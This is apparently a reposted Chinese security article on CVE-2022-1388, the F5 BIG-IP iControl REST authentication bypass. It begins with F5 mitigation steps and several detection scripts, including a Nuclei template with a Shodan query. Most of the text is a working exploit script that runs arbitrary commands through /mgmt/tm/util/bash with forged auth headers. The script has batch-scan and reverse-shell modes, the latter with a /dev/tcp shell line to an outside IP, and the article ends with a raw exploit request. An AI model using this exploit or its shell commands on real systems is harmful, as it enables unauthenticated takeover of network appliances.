转载:https://www.ddosi.org/cve-2022-1388/
排版:释然IT杂谈
-
通过自身 IP 地址阻止 iControl REST 访问
(https://support.f5.com/csp/article/K23605346#proc1)
-
通过管理界面阻止 iControl REST 访问
(https://support.f5.com/csp/article/K23605346#proc2)
-
修改 BIG-IP httpd 配置
(https://support.f5.com/csp/article/K23605346#proc3)
通过自身 IP 地址阻止 iControl REST 访问
注意:执行此操作会阻止使用自身 IP 地址访问配置实用程序和 iControl REST。这些更改还可能影响其他服务,包括破坏高可用性 (HA) 配置。
-
K17333:端口锁定行为概述 (12.x – 16.x)
(https://support.f5.com/csp/article/K17333)
-
K13092:保护对 BIG-IP 系统的访问的概述
(https://support.f5.com/csp/article/K13092)
-
K31003634:单网卡 BIG-IP 虚拟版的配置实用程序现在默认使用 TCP 端口 8443
(https://support.f5.com/csp/article/K31003634)
-
K51358480:单网卡 BIG-IP VE 可能会在重新加载配置后错误地恢复为默认管理 httpd 端口
-
K13383:为 BIG-IP 数据包过滤器配置 CIDR 网络地址
(https://support.f5.com/csp/article/K13383)
通过管理界面阻止 iControl REST 访问
-
K13092:保护对 BIG-IP 系统的访问的概述
(https://support.f5.com/csp/article/K13092)
-
K46122561:使用网络防火墙规则限制对管理界面的访问
(https://support.f5.com/csp/article/K46122561)
-
K69354049:使用 iptables 限制对 Configuration Utility 和 iControl REST 服务的 BIG-IP 管理界面的访问
(https://support.f5.com/csp/article/K69354049)
注意:在httpd中通过 IP 地址限制对管理界面的访问不是解决此问题的可行方法。
修改 BIG-IP httpd 配置
-
BIG-IP 14.1.0 及更高版本
(https://support.f5.com/csp/article/K23605346#proc3a)
-
BIG-IP 14.0.0 及更早版本
(https://support.f5.com/csp/article/K23605346#proc3b)
BIG-IP 14.1.0 及更高版本
tmsh
edit /sys httpd all-properties
"<If "%{HTTP:connection} =~ /close/i ">
RequestHeader set connection close
</If>
<ElseIf "%{HTTP:connection} =~ /keep-alive/i ">
RequestHeader set connection keep-alive
</ElseIf>
<Else>
RequestHeader set connection close
</Else>"
:wq
在保存更改 (y/n/e)提示下,选择y以保存更改。
通过输入以下命令保存 BIG-IP 配置:
save /sys config
BIG-IP 14.0.0 及更早版本
程序的影响:执行以下程序不会对您的系统产生负面影响。
通过输入以下命令 登录到BIG-IP 系统的tmsh :
tmsh
edit /sys httpd all-properties
"RequestHeader set connection close"
:wq
在保存更改 (y/n/e)提示下,选择y以保存更改。
通过输入以下命令保存 BIG-IP 配置:
save /sys confighttps://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
CVE-2022-1388.sh:
#!/bin/bash
#-*- ENCODING: UTF-8 -*-
# Simple CVE-2022-1388 checker
archivo=$1
barra=`echo "-------------------------------------------------"`
dt=`date +"%Y_%m_%d_%H%M%S"`
#-------Colores-------
endColour="33[0me[0m"
redColour="e[0;31m33[1m"
grayColour="e[0;37m33[1m"
greenColour="e[0;32m33[1m"
function helpPanel (){
echo -e "nt[+] Uso: ./CVE-2022-1388.sh hosts.txt"
exit 1
}
if [ -f $dt"/temp.tmp" ];then
rm -f $dt"/temp.tmp"
fi
function checker (){
carpeta=`mkdir $dt`
for ip in $(cat $archivo | sort -u );do
request=`curl -sk --max-time 2 "https://$ip/mgmt/shared/authn/login" | grep -q "resterrorresponse"`
if [ $? -eq 0 ]; then
echo $barra
echo -e "[x] Host: $ip F5 iControl Rest API exposed" >> $dt"/report.txt"
echo -e "${redColour}"$(tail -n1 $dt"/report.txt")"${endColour}"
else
echo $barra
echo -e "[✔] Host: $ip No Detectado" >> $dt"/report.txt"
echo -e "${greenColour}"$(tail -n1 $dt"/report.txt")"${endColour}"
fi
done
echo $barra; sleep 1
echo -e " ${greenColour}[✔]${endColour}${grayColour} Total equipos OK: ${endColour}${greenColour}"$(cat $dt"/report.txt" | grep "[✔]" | wc -l)"${endColour}"
echo $barra; sleep 1
echo -e " ${redColour}[x]${endColour}${grayColour} Total equipos detectados: ${endColour}${redColour}"$(cat $dt"/report.txt" | grep "[x]" | wc -l)"${endColour}"
echo $barra; sleep 1
rm -f $dt"/temp.tmp" >/dev/null 2>&1
exit 0
}
if [ $# -eq 0 ]; then
helpPanel
else
checker
fi
./CVE-2022-1388.sh hosts.txthttps://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed
这仅通过点击身份验证端点来验证 API 的存在
CVE-2022-1388.yaml:
id: bigip-icontrol-rest
info:
name: F5 BIG-IP iControl REST Panel
author: MrCl0wnLab
severity: info
description: |
Undisclosed requests may bypass iControl REST authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
metadata:
shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
classification:
cve-id: CVE-2022-1388
cwe-id: CWE-306
tags: cve,cve2022,bigip,f5icontrol
requests:
- method: GET
path:
- "{{BaseURL}}/mgmt/shared/authn/login"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
matchers:
- type: word
part: body
words:
- "resterrorresponse"
- "message"
- type: status
status:
- 401
这个模板是一个简单的检查
发送请求:
路径:
{{BaseURL}}/mgmt/shared/authn/login匹配器:
字:
“resterrorresponse”
“message”
状态码:
401POC 手册:
curl -sk --max-time 2 "https://{TARGET}/mgmt/shared/authn/login" | egrep "message|resterrorresponse" | jq
返回:
{
"code": 401,
"message": "Authorization failed: no user authentication header or token detected. Uri:http://localhost:8100/mgmt/shared/authn/login Referrer:xxx.xxx.177.228 Sender:xxx.xxx.177.228",
"referer": "xxx.xxx.177.228",
"restOperationId": 1461894338,
"kind": ":resterrorresponse"
}https://github.com/bytecaps/CVE-2022-1388-EXP/blob/main/check.py
CVE-2022-1388-check.py:
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time : 2022/5/7 23:40
# @Author : Caps
# @Email : [email protected]
# @File : check.py
# @Software: PyCharm
import requests
import argparse
requests.packages.urllib3.disable_warnings()
def usage():
print('''
+-----------------------------------------------------------------+
漏洞名称: F5 BIG-IP iControl Rest API exposed Check
功能:单个检测,批量检测
单个检测:python exp.py -u url
批量检测:python exp.py -f url.txt
+-----------------------------------------------------------------+
''')
def check(url):
try:
target_url = url + "/mgmt/shared/authn/login"
res = requests.get(target_url, verify=False, timeout=3)
if "resterrorresponse" in res.text:
print(f"33[0;31;22m[+] Host: {url} F5 iControl Rest API exposed 33[0m")
else:
print(f"33[0;32;22m[-] Host: {url} F5 not vulnerability 33[0m")
except Exception as e:
print(f"33[0;33;22m[x] Host: {url} Connection Fail 33[0m")
def run(filepath):
urls = [x.strip() for x in open(filepath, "r").readlines()]
for u in urls:
check(u)
return check
def main():
parse = argparse.ArgumentParser()
parse.add_argument("-u", "--url", help="Please Poc.py -u host")
parse.add_argument("-f", "--file", help="Please poc.py -f file")
args = parse.parse_args()
url = args.url
filepath = args.file
if url is not None and filepath is None:
check(url)
elif url is None and filepath is not None:
run(filepath)
else:
usage()
if __name__ == '__main__':
main()
使用方法:
└─# python3 check.py
+-----------------------------------------------------------------+
漏洞名称: F5 BIG-IP iControl Rest API exposed Check
功能:单个检测,批量检测
单个检测:python exp.py -u url
批量检测:python exp.py -f url.txt
+-----------------------------------------------------------------+
CVE-2022-1388 Exp
CVE-2022-1388-exp.py
CVE-2022-1388 F5 BIG-IP RCE 批量检测
#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time : 2022/5/9 16:52
# @Author : Caps
# @Email : [email protected]
# @File : CVE-2022-1388.py
# @Software: PyCharm
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())
def title():
print('''
_____ _ _ _____ _____ _____ _____ _____ __ _____ _____ _____
/ __ | | | || ___| / __ | _ |/ __ / __ / | |____ || _ || _ |
| / /| | | || |__ ______`' / /'| |/' |`' / /'`' / /'______`| | / / V / V /
| | | | | || __||______| / / | /| | / / / / |______|| | / _ / _
| __/\ _/ /| |___ ./ /___ |_/ /./ /___./ /___ _| |_.___/ /| |_| || |_| |
____/ ___/ ____/ _____/ ___/ _____/_____/ ___/____/ _____/_____/
Author:Caps@BUGFOR
Github:https://github.com/bytecaps
''')
print('''
验证模式:python CVE_2022_1388.py -v true -u target_url
攻击模式:python CVE_2022_1388.py -a true -u target_url -c command
批量检测:python CVE_2022_1388.py -s true -f file
反弹模式:python CVE_2022_1388.py -r true -u target_url -c command
''')
def headers():
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
'Content-Type': 'application/json',
'Connection': 'keep-alive, x-F5-Auth-Token',
'X-F5-Auth-Token': 'a',
'Authorization': 'Basic YWRtaW46'
}
return headers
def check(target_url):
check_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c id"}
try:
response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
print("[+] 目标 {} 存在漏洞".format(target_url))
else:
print("[-] 目标 {} 不存在漏洞".format(target_url))
except Exception as e:
print('url 访问异常 {0}'.format(target_url))
def attack(target_url, cmd):
attack_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
try:
response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
if response.status_code == 200 and 'commandResult' in response.text:
default = json.loads(response.text)
display = default['commandResult']
print("[+] 目标 {} 存在漏洞".format(target_url))
print('[+] 响应为:{0}'.format(display))
else:
print("[-] 目标 {} 不存在漏洞".format(target_url))
except Exception as e:
print('url 访问异常 {0}'.format(target_url))
def reverse_shell(target_url, command):
reverse_url = target_url + '/mgmt/tm/util/bash'
data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
# command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
try:
requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
except Exception as e:
print("[+] 请自行查看是否反弹shell回来")
def scan(file):
for url_link in open(file, 'r', encoding='utf-8'):
if url_link.strip() != '':
url_path = format_url(url_link.strip())
check(url_path)
def format_url(url):
try:
if url[:4] != "http":
url = "https://" + url
url = url.strip()
return url
except Exception as e:
print('URL 错误 {0}'.format(url))
def main():
parser = argparse.ArgumentParser("F5 Big-IP RCE")
parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ')
parser.add_argument('-u', '--url', type=str, help=' 目标URL ')
parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')
parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')
parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ')
args = parser.parse_args()
verify_model = args.verify
url = args.url
attack_model = args.attack
command = args.command
scan_model = args.scan
file = args.file
shell_model = args.shell
if verify_model is True and url is not None:
check(url)
elif attack_model is True and url is not None and command is not None:
attack(url, command)
elif scan_model is True and file is not None:
scan(file)
elif shell_model is True and url is not None and command is not None:
reverse_shell(url, command)
else:
sys.exit(0)
if __name__ == '__main__':
title()
main()
简单来说exp如下所示:
POST /mgmt/tm/util/bash HTTP/1.1
Host:
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46
Connection: keep-alive, x-F5-Auth-Token
Content-Length: 0
Cache-Control: max-age=0
{
"command":"run",
"utilCmdArgs":"-c id"
}
原文始发于微信公众号(释然IT杂谈):CVE-2022-1388 exp F5 BIG-IP未授权RCE漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论